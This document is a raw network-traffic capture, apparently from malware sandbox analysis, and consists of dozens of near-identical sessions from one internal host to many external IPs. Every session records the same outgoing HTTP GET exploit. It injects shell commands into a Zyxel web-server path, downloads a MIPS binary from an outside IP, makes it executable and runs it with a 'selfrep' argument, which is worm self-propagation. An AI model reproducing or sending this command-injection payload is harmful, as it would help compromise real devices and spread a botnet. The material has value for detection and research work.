                                    Jan 13, 2024 19:02:30.089561939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3523192.168.2.134973438.98.210.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089618921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3524192.168.2.134273871.121.194.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089690924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3525192.168.2.1359374109.16.111.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089780092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3526192.168.2.1333788168.48.88.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089787960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3527192.168.2.1335032133.167.94.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.089881897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3528192.168.2.1360846176.249.245.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.103878975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3529192.168.2.1356504130.122.93.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104027987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3530192.168.2.135718099.59.19.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104063988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3531192.168.2.135266246.160.32.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104099035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3532192.168.2.1337160143.55.82.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104171991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3533192.168.2.133912892.142.59.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104231119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3534192.168.2.135863841.23.164.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104300976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3535192.168.2.136078447.66.152.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104357004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3536192.168.2.135776457.53.99.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104460955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3537192.168.2.1356718117.211.201.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104482889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3538192.168.2.1338838121.1.202.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104573965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3539192.168.2.1355006162.229.255.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104617119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3540192.168.2.1355550146.31.135.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104690075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3541192.168.2.134937038.185.174.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104773045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3542192.168.2.1335830146.59.169.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104819059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3543192.168.2.1341078130.113.193.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104878902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3544192.168.2.1344498210.204.123.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104933023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3545192.168.2.133734681.26.161.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.104988098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3546192.168.2.1357960172.110.113.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105031967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3547192.168.2.1346566174.232.2.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105063915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3548192.168.2.1338782165.227.196.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105153084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3549192.168.2.1358318124.85.61.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105170965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3550192.168.2.1338156164.142.68.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105211973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3551192.168.2.1337994193.188.101.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105284929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3552192.168.2.134981461.125.69.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105334044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3553192.168.2.1353558100.242.225.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105412960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3554192.168.2.1356666167.43.115.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105508089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3555192.168.2.1341092206.255.66.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105540037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3556192.168.2.1355100205.142.45.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105590105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3557192.168.2.1351398165.93.67.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105657101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3558192.168.2.1345032118.82.35.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105731010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3559192.168.2.1358946166.182.250.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105762005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3560192.168.2.1355902157.104.132.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105843067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3561192.168.2.1337394115.72.160.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105910063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3562192.168.2.135841084.212.134.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.105973959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3563192.168.2.1339096173.143.5.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106049061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3564192.168.2.134391878.59.168.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106060982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3565192.168.2.134218839.1.114.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106100082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3566192.168.2.1338220199.114.172.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106177092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3567192.168.2.1344850170.167.15.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106242895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3568192.168.2.13566561.126.112.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106290102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3569192.168.2.135930264.178.72.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106344938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3570192.168.2.1347904189.33.208.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106414080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3571192.168.2.1336602174.241.85.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106481075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3572192.168.2.135512060.243.168.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106551886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3573192.168.2.1340980223.45.54.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106589079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3574192.168.2.133600665.150.211.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106652021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3575192.168.2.1353534152.231.169.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106702089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3576192.168.2.1351916104.64.0.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106774092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3577192.168.2.1341998121.199.126.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106795073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3578192.168.2.1343094175.174.238.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106864929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3579192.168.2.1336786202.39.90.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106942892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3580192.168.2.1336966208.166.11.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.106992960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3581192.168.2.1352446197.200.223.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107033968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3582192.168.2.134119674.201.22.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107099056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3583192.168.2.1333066154.28.176.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107146978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3584192.168.2.1348722108.25.240.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107206106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3585192.168.2.135041692.184.42.103443
                                    TimestampBytes transferredDirectionData
